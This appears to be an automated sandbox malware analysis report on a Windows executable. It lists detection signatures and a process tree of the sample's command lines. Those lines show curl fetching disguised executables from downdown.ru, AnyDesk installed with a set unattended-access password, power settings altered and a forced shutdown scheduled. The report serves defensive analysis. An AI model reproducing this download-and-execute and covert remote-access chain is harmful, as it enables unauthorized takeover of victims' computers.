Edit tour
Windows
Analysis Report
Yv24LkKBY6.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Allocates memory in foreign processes
Creates files in the system32 config directory
Disables DEP (Data Execution Prevention) for certain images
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files with benign system names
Found stalling execution ending in API Sleep call
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global get message hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Group Policy settings
Modifies power options to not sleep / hibernate
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses shutdown.exe to shutdown or reboot the system
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64native
- Yv24LkKBY6.exe (PID: 5908 cmdline:
"C:\Users\ user\Deskt op\Yv24LkK BY6.exe" MD5: F0ABA799546B1CE04037793579DE3C94) - AcroRd32.exe (PID: 2296 cmdline:
"C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroR d32.exe" " C:\Intel\ 131.pdf" MD5: 6791EAE6124B58F201B32F1F6C3EC1B0) - cmd.exe (PID: 4152 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>C :\Intel\re zet.cmd cd C:\Intel\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5060 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - attrib.exe (PID: 2508 cmdline:
"C:\Window s\System32 \attrib.ex e" +s +h C :\Intel MD5: 0E938DD280E83B1596EC6AA48729C2B0) - conhost.exe (PID: 2120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6888 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd p ing -n 6 1 27.0.0.1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1892 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7392 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\d river.exe http://dow ndown.ru/d river.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 1268 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\b lat.exe ht tp://downd own.ru/bla t.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6432 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\s vchost.exe http://do wndown.ru/ svchost.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 5796 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\T rays.rar h ttp://down down.ru/Tr ays.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 8036 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\A nyDesk\wol .ps1 http: //downdown .ru/wol.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5392 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6320 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\d c.exe http ://downdow n.ru/dc.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 2816 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\dr iver.exe x -r -ep2 - hplimpid29 03392 C:\I ntel\Trays .rar C:\In tel\ /y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 4152 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd s tart C:\In tel\Trays\ Trays.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 2508 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd s vchost.exe --install C:\Intel\ AnyDesk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6888 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\A nyDesk\bat .bat http: //downdown .ru/bat.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 2244 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\An yDesk\bat. lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 6028 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Inte l\rezet.cm d" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - PING.EXE (PID: 8052 cmdline:
ping -n 6 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - curl.exe (PID: 4108 cmdline:
C:\Intel\c url.exe -o C:\Intel\ driver.exe http://do wndown.ru/ driver.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 6188 cmdline:
C:\Intel\c url.exe -o C:\Intel\ blat.exe h ttp://down down.ru/bl at.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 6632 cmdline:
C:\Intel\c url.exe -o C:\Intel\ svchost.ex e http://d owndown.ru /svchost.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 3588 cmdline:
C:\Intel\c url.exe -o C:\Intel\ Trays.rar http://dow ndown.ru/T rays.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 1956 cmdline:
C:\Intel\c url.exe -o C:\Intel\ AnyDesk\wo l.ps1 http ://downdow n.ru/wol.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 7956 cmdline:
C:\Intel\c url.exe -o C:\Intel\ dc.exe htt p://downdo wn.ru/dc.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - driver.exe (PID: 1904 cmdline:
C:\Intel\d river.exe x -r -ep2 -hplimpid2 903392 C:\ Intel\Tray s.rar C:\I ntel\ /y MD5: 29086D9247FDF40452563C11B3DCA394) - Trays.exe (PID: 2476 cmdline:
"C:\Intel\ Trays\Tray s.exe" -tr ay MD5: 90D208B856DEA18596D57FFB1DD3A867) - 4t-min64.exe (PID: 2020 cmdline:
"C:\Intel\ Trays\4t-m in64.exe" "C:\Intel\ Trays\Shel lEh6055x64 .dll" MD5: 7BC3AEEDC18717D796F1C7FF8DBF0C17) - svchost.exe (PID: 7000 cmdline:
svchost.ex e --instal l C:\Intel \AnyDesk MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - svchost.exe (PID: 3588 cmdline:
"C:\Intel\ svchost.ex e" --local -service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - svchost.exe (PID: 3440 cmdline:
"C:\Intel\ svchost.ex e" --local -control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - curl.exe (PID: 6064 cmdline:
C:\Intel\c url.exe -o C:\Intel\ AnyDesk\ba t.bat http ://downdow n.ru/bat.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - cmd.exe (PID: 7916 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Inte l\AnyDesk\ bat.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 948 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho QWERTY1 234566 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - AnyDesk.exe (PID: 808 cmdline:
AnyDesk.ex e --set-pa ssword _un attended_a ccess MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - dc.exe (PID: 7224 cmdline:
C:\Intel\d c.exe /D MD5: 139464919440E93E49C80CC890B90585) - dc.exe (PID: 2444 cmdline:
"C:\Intel\ dc.exe" /S YS 1 MD5: 139464919440E93E49C80CC890B90585) - powercfg.exe (PID: 7488 cmdline:
powercfg - setacvalue index SCHE ME_CURRENT 4f971e89- eebd-4455- a8de-9e590 40e7347 5c a83367-6e4 5-459f-a27 b-476b1d01 c936 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 4628 cmdline:
powercfg - change -st andby-time out-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 480 cmdline:
powercfg - change -hi bernate-ti meout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 7956 cmdline:
powercfg - h off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 2380 cmdline:
powercfg / SETDCVALUE INDEX SCHE ME_CURRENT 238c9fa8- 0aad-41ed- 83f4-97be2 42c8f20 bd 3b718a-068 0-4d9d-8ab 2-e1d2b4ac 806d 1 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - powercfg.exe (PID: 6592 cmdline:
powercfg / SETACVALUE INDEX SCHE ME_CURRENT 238c9fa8- 0aad-41ed- 83f4-97be2 42c8f20 bd 3b718a-068 0-4d9d-8ab 2-e1d2b4ac 806d 1 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05) - schtasks.exe (PID: 7720 cmdline:
schtasks / create /tn "Shutdown At5AM" /tr "shutdown /s /f /t 0" /sc dai ly /st 05: 00 MD5: 478BEAEC1C3A9417272BC8964ADD1CEE) - powershell.exe (PID: 7464 cmdline:
Powershell .exe -exec utionpolic y remotesi gned -File C:\Intel\ AnyDesk\wo l.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- AnyDesk.exe (PID: 2596 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 2728 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 7952 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --new-in stall MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - AnyDesk.exe (PID: 7876 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --crash-h andler MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 6400 cmdline:
C:\Windows \system32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s fhsvc MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 4584 cmdline:
C:\Windows \System32\ svchost.ex e -k NetSv cs -p -s N caSvc MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 3380 cmdline:
C:\Windows \system32\ svchost.ex e -k Local SystemNetw orkRestric ted -s WPD BusEnum MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 4112 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s s eclogon MD5: F586835082F632DC8D9404D83BC16316)
- svchost.exe (PID: 8 cmdline:
C:\Windows \System32\ svchost.ex e -k NetSv cs -p -s N caSvc MD5: F586835082F632DC8D9404D83BC16316)
- shutdown.exe (PID: 3396 cmdline:
C:\Windows \system32\ shutdown.E XE /s /f / t 0 MD5: F2A4E18DA72BB2C5B21076A5DE382A20) - conhost.exe (PID: 7860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- msedge.exe (PID: 7532 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-11T07:53:56.006785+0100 | 2008754 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.11.20 | 49757 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-11T07:53:49.151969+0100 | 2025169 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.11.20 | 49754 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-11T07:53:49.151969+0100 | 2025161 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.11.20 | 49754 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Binary or memory string: | memstr_c3d5e25a-9 |
Source: | Static PE information: |
Source: | File created: | ||
Source: | File created: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 34_2_002CCD06 | |
Source: | Code function: | 34_2_002CFCDD | |
Source: | Code function: | 40_2_0040F8BC | |
Source: | Code function: | 41_2_00407C0E | |
Source: | Code function: | 41_2_0040DB44 | |
Source: | Code function: | 41_2_0040DDDC | |
Source: | Code function: | 42_2_03E34400 | |
Source: | Code function: | 44_2_03E34400 | |
Source: | Code function: | 45_2_03E34400 |
Source: | Code function: | 41_2_00407D0E |
Source: | Code function: | 43_2_00418560 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network Connect: |
Source: | Image file has PE prefix: |